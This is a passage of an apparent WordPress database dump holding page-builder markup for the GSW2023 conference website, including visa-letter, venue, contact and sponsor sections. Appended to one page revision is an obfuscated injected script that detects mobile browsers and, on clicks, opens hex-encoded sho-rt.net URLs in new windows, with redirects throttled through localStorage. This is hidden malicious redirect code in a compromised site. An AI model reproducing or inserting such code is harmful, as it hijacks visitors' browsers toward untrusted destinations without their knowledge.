ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-27 12:03:42','2023-07-27 12:03:42','',3066,'https://gsw2023.com/?p=5055',0,'revision','',0),
(5056,1,'2023-07-27 12:03:49','2023-07-27 12:03:49','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" 